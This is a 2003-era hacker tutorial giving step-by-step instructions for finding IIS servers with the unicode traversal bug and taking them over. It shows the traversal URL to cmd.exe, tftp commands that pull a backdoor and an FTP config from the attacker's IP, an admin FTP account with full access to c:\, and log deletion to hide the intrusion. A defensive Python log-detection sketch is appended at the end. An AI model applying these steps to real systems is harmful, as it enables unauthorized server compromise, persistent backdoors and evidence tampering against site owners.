Toolz Needed:
--------------
1. http://hackerzlair.org/text/toolz.zip
2. Your 3rain q:)

*******************
* Getting started *
*******************

1. Extract the file Toolz.zip to "c:\".

2. Go to "c:\ftp\Serv-u" and run "ServUAdmin.exe".

3. Configuring Serv-u:
   A. Double click on "<< Local Server >>" --> now you should see "Domains", click on it once and double click on "FTP".
   B. Set a port for the ftp (to apply the port --> right click on the background and then "apply").
   C. Right click on "Users" and "New User".
   D. Enter a Username, Password, Home Directory (make it "c:\") and when it asks you: "Lock user in Home directory?" --> select "No" and press "Finish".
   E. Go to the Privilege field and select "System Administrator".
   F. Move to the "Dir Access" tab, click once on "c:\" and mark every checkbox in there.
   G. Right click on the background and select "apply".
   H. Close Serv-u.

4. Go to "c:\ftp\Serv-u" and copy the file "servudaemon.ini" to "c:\ftp".

5. Configuring TFTP:
   A. Go to "C:\ftp\TFTP" and run "TFTPServer32.exe" (a nag screen will show up.. Press "register" and then "cancel" ;)
   B. Once TFTP is up, go to "System --> Setup" (or just Ctrl+U).
   C. Select the "Inbound" tab and in the "Inbound File Path" field, type "c:\ftp\".
   D. Select the "Outbound" tab and in the "Outbound File Path" field, type "c:\ftp" and press "OK".
   E. Minimize TFTP.

6. Press "Start --> Run" and type in "command".

7. Get into "C:\ftp" and type "sfind -uni IP-START IP-END"
   (e.g: "sfind -uni 205.179.50.1 205.179.51.1" - This will scan all ips from 205.179.50.1 to 205.179.51.1).

*********
* Notes *
*********
A. Once sfind finds an IP, it writes it to the screen (you won't be able to miss it, don't worry).
B. sfind logs its results to a file named "sfind.txt" (should be in the same location as sfind).

8. Once sfind finds a server with the unicode bug, go to "c:\ftp\Accessdiver" and run "ad4.103.exe".

9. In AccessDiver, go to "My Skill --> FAMILIAR", then again go to "My Skill --> Exploiter Mode".

10. Take an IP that was found by sfind and enter it in the "Server" field in this form: "http://ip" (e.g "http://212.179.50.1").

11. Press "START".

12. After it has finished scanning, look for an "Error 502".

13. Once you have found an "Error 502", select it and press the eye symbol on the right (if you didn't find any "Error 502", move to the next IIS server).
    * The explorer will pop up once you press the eye symbol and you are supposed to be at this kind of address:
      http://xxx.xxx.xxx.xx/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
    * These are the files that the server holds on drive "c:\" (just like DOS).
    * Now all you have to do is upload the files "servudaemon.ini" (our FTP configuration file) and "WINMGNT.EXE" and then run "WINMGNT.EXE" on the server.

14. Uploading:
    A. WINMGNT.EXE - all you need to do is replace the "dir+c:\" in the address with this -->
       c:\winnt\system32\tftp.exe+"-i"+YourIPHere+get+WINMGNT.EXE+c:\WINMGNT.EXE
       (YourIPHere = the IP address that is written on your TFTP's Title Bar)
    B. servudaemon.ini - same as above.. just replace the "dir+c:\" with -->
       c:\winnt\system32\tftp.exe+"-i"+YourIPHere+get+servudaemon.ini+c:\servudaemon.ini
       (YourIPHere = the IP address that is written on your TFTP's Title Bar)

15. Running WINMGNT.EXE - same as above.. just replace the "dir+c:\" with -->
    c:\WINMGNT.EXE%20/h

**************
* Last Notes *
**************
A. Sometimes the server doesn't allow you to upload files (in this case, move to another IIS server).
B. When uploading files, you may see the transfer in the TFTP window.
C. Sometimes the server has a protection which won't let you upload WINMGNT.EXE.
D. When entering the ftp, make sure you delete the log file that was created when the ftp was created: "ServUStartUpLog.txt" (it should be in the same directory as WINMGNT.EXE and servudaemon.ini).

This file was written by Oc48- © 2003. Hope you enjoyed q;-).
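
Seen from the server side, the request form shown in step 13 and the tftp.exe fetches in step 14 stand out in web server logs once the URI is percent-decoded repeatedly rather than once. The detection sketch below is an added example, not part of the original file; the log field order, the sample lines and the addresses in them are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not real logs). Assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = r"""
2003-01-01 10:00:01 192.0.2.10 GET /default.htm - 200
2003-01-01 10:00:05 198.51.100.7 GET /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe /c+dir+c:\ 502
2003-01-01 10:00:09 198.51.100.7 GET /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe /c+c:\winnt\system32\tftp.exe+"-i"+192.0.2.99+get+WINMGNT.EXE+c:\WINMGNT.EXE 502
2003-01-01 10:00:12 192.0.2.11 GET /docs/50%25-off.htm - 200
"""

TRAVERSAL = re.compile(r"\.\.[\\/]")                      # "../" or "..\" after decoding
SHELL_TOOLS = re.compile(r"\b(cmd|tftp)\.exe\b", re.I)    # binaries named on this page
MAX_ROUNDS = 5                                            # bound on nested encodings

def fully_decode(s):
    """Percent-decode until the string stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        nxt = unquote(s)
        if nxt == s:
            break
        s, rounds = nxt, rounds + 1
    return s, rounds

def classify(line):
    """Return (client_ip, reasons) for a suspicious line, else None."""
    fields = line.split()
    if len(fields) != 7:
        return None
    ip, stem, query = fields[2], fields[4], fields[5]
    stem_dec, rounds = fully_decode(stem)
    query_dec, _ = fully_decode(query)
    reasons = []
    if TRAVERSAL.search(stem_dec):
        reasons.append("traversal")
    if rounds > 1:                      # a single round is ordinary URL encoding
        reasons.append("multi-encoded")
    tools = {t.lower() for t in SHELL_TOOLS.findall(stem_dec + " " + query_dec)}
    reasons += sorted(f"exec:{t}" for t in tools)
    return (ip, reasons) if reasons else None

def scan(text):
    return [hit for line in text.splitlines() if (hit := classify(line))]

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, ",".join(reasons))
```

A check that decodes the URI only once sees `..%5c..` and misses the traversal, which is why the decoder loops until the string is stable.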